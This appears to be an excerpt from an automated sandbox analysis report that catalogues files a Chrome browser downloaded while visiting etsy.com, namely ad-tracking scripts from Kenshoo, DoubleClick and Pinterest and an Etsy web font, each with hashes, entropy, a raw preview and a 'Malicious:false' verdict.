                                                                                                                                                                URL:https://resources.xg4ken.com/js/v2/ktag.js?tid=KT-N3B63-3EB
                                                                                                                                                                Preview:/* ktag.js - 2024-09-23 */.var Ktag_Constants=function(){return{KENSHOO_GCLID_NAME:"ken_gclid",GOOGLE_ADS_CLICK_PARAM_NAME:"_gac",GOOGLE_CLICK_ID_PARAM_NAME:"gclid",BING_CLICK_ID_PARAM_NAME:"msclkid",NO_PUBLISHER_CLICK_ID_PARAM_NAME:"npclid",AMP_CHANNEL_CLICK_ID_COOKIE_NAME:"ken_amp_gclid",AMP_LINKER_PARAM_NAME:"linker",UNIVERSAL_CHANNEL_PARAM_NAME:"kclid",UNIVERSAL_CHANNEL_COOKIE_NAME:"ken_uc",KPID_NAME:"kenpid",GBRAID_NAME:"gbraid",WBRAID_NAME:"wbraid",KENSHOO_GBRAID_NAME:"ken_gbraid",KENSHOO_WBRAID_NAME:"ken_wbraid",KENSHOO_PID_NAME:"ken_pid",KENSHOO_UUID_NAME:"ken_uuid"}}(),Ktag_Toggles=function(){return{isParseAmpLinkerParameters:function(){return!1},isUseNpclid:function(){return!0},isSupportFloodlightTag:function(){return!1},getFixelId:function(){return""},isDummyEnabled:function(){return!0},isDummyDisabled:function(){return!1},isDummyEnabledForDummyTids:function(){return!1},isDummyDisabledForDummyTids:function(){return!0},getDummyString:function(){return"Hello"},getDummyNumber:f
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (726), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):726
                                                                                                                                                                Entropy (8bit):5.6072042137631275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E0DF5E3E9A56956CDF8E3B94346FFCDB
                                                                                                                                                                SHA1:10AD7C3DF0B9509D5CA9F099AA78054C8E8D5239
                                                                                                                                                                SHA-256:D1BFF62F97ABFBBD3937882816669A1C88859206F5FB5350EF01866DC209F91C
                                                                                                                                                                SHA-512:0AFDB6F9FE8CEE3535602B339193E524776DA330CEA6CE4320D3D52576D10903279FA3A439969B00A870EF4DC7DC59B425AA02447A109D6415BDAD9673DEEFC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://9910951.fls.doubleclick.net/activityi;dc_pre=CMmS_c2tgokDFdqQgwcdoAggrg;src=9910951;type=remarkt;cat=unive0;ord=9677501052098;npa=0;auiddc=2111120285.1728513237;u2=%2F;u3=undefined;ps=1;pcor=1074523630;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
                                                                                                                                                                Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CMmS_c2tgokDFdqQgwcdoAggrg;src=9910951;type=remarkt;cat=unive0;ord=9677501052098;npa=0;auiddc=*;u2=%2F;u3=undefined;ps=1;pcor=1074523630;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F"/></body></html>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 28272, version 1.0
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):28272
                                                                                                                                                                Entropy (8bit):7.993468808748159
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:3702E4A9A8E642C049309B602F004889
                                                                                                                                                                SHA1:0ED4B32A6F3B01CFA94EA38246D8E8953CA41354
                                                                                                                                                                SHA-256:DC9ADBD7374AAF571A3EFC69187E30DAC41FCB04F678A1387C63BD7D558DDFA8
                                                                                                                                                                SHA-512:0981888B83085F62581E9F1FD2DBDB34B6FDBB2702045AF6D67294ADF8EA710658B9B755F060E70AA69FBDCD0C6E9357FC05C0971F6CD52F59AC8C5911E042A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/assets/type/Guardian-EgypTT-Light.woff2
                                                                                                                                                                Preview:wOF2......np......G...n.................................`..V....s...H..,.....6.$..4. ..L..P..^[.&q#..|...0X...U.....6...z.*:b...........f.....%...P.s.!RU.>/..yu..=..\.p.=0.~l*..U&uT....;BwF.^..4.r..S..........xkyCx]...`..`.`..pl..a.M..S.O.}[Z.iw...4..^..G\..L.P,1T.+,7.;.,...ZpNb...=.8t^mW{N..:.:V._..Ov.B.pa.....U@96.F.r....?...{3.%$9..Qh.....(..........<B2....g$fm....%..q..S..J].P...+u....b.M...n{......Z..5.....u.?:.O...I ."..g..Y{..:...+....(.a.^.65.....C.....X(.....I....O...+.....9..J.(.rb...H.=...\.......uS.B......>.v...(...OSa...%WV.~..(...S..0.jz.}S.jd/T.......U.6.q...d...N...uD...$Y. .H....B&.;?.......!0..9x......q....eD.).t....,.$.:..s..N....8...Rd.7{/$..c$..&.0..+4..sj.Q+%...1.^g>.gy6.....rR..B...2.v...)...`.e..~..\.+QL........6P......_.(...L.kw=.D.D.\.D.G.H$..s.P..>.W......R...[..-....... N...p!.).:UM#...!0u.=J^..B`l]..=.*....{........w..z...J).|.<.t.....{[Z..=n......u..[Z.t+. .y.OO...5.F4....4..$.d.....k..Y`f.-.2.w9G.^._.1..e..
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, was "main.97c41ef3.js", last modified: Fri Aug 23 15:57:59 2024, from Unix, original size modulo 2^32 83598
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):27512
                                                                                                                                                                Entropy (8bit):7.993187350119009
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0304D337D72A7B17907261BF86E2F221
                                                                                                                                                                SHA1:D56F37B6686036EE3945D877BAF2849245073FCE
                                                                                                                                                                SHA-256:F8501D2AAB7B556B8D8A56E8F7C6E9E21D01204249AC6D43470015AA86E2A5A7
                                                                                                                                                                SHA-512:6D15FC21EFD7CB6BDD2924CB9C16E1B8ABF070AFBA1C63B7FAF998A1CB7ACB3A0CAD5F52EC27EE8763328669F40AD50CA32D62A2E94AF4073218C5DC4B79FFA3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://s.pinimg.com/ct/lib/main.97c41ef3.js
                                                                                                                                                                Preview:.......f..main.97c41ef3.js..\.o...*...b%...8.,.h{3`.[;,.... Pl:..Py..47.>.;..%..4....D......?.C.`Y.HRn3.p.g..>l.....B5.i.D.q;;...)^.$..:<.]..&.D.>l...G.y.^.|X......7kz...M....pN3....2./..d..%.l>_...b.`.._..e.^v{`..fY|.f!..b"d[..z.A.<X.Wo/..*.oX...__..~_....Td...._..]#..u.]../.X3kK......<.R.(..8....E...Nl`.{..D..,.<..S+.#XTO........."2ZB.g,....zM......(s-h....v...s.c q..5K9Y..-........2.\....f;.L.B.r3BJ..1d.o,..I.c.a1..T..$..6ly....w....r9..6.z...M....6\...;.y..._@.7.....S.'[.. ..........lz.;.....O....#......J..._...._..................|4>.M.G.......q0.V./..`.R.Xe.]....o1.b'Y..f..au.E.....Y...._..U-L..H........J...Br..j>...V............((A.{UY..}`....U....".s....t@.W$P.-..K...ZiVf#...Z.v.`..4..=.......B~...2.......L.\.'.@...].pw.zq..^..(.'..3.........4)L.,....<-.UT^.).XD.x...e`ML..O..&T..r.......{.~.......-Q.!s...2g..20-D.F.L.Xn.].Q...f..RJ.ZI.lN.m......~u..v.7%.#....m.Pn.v$4....v..M........>gT...0....Y%.).6s;+......vA.v.d.Z...p...C....x..
                                                                                                                                                                No static file info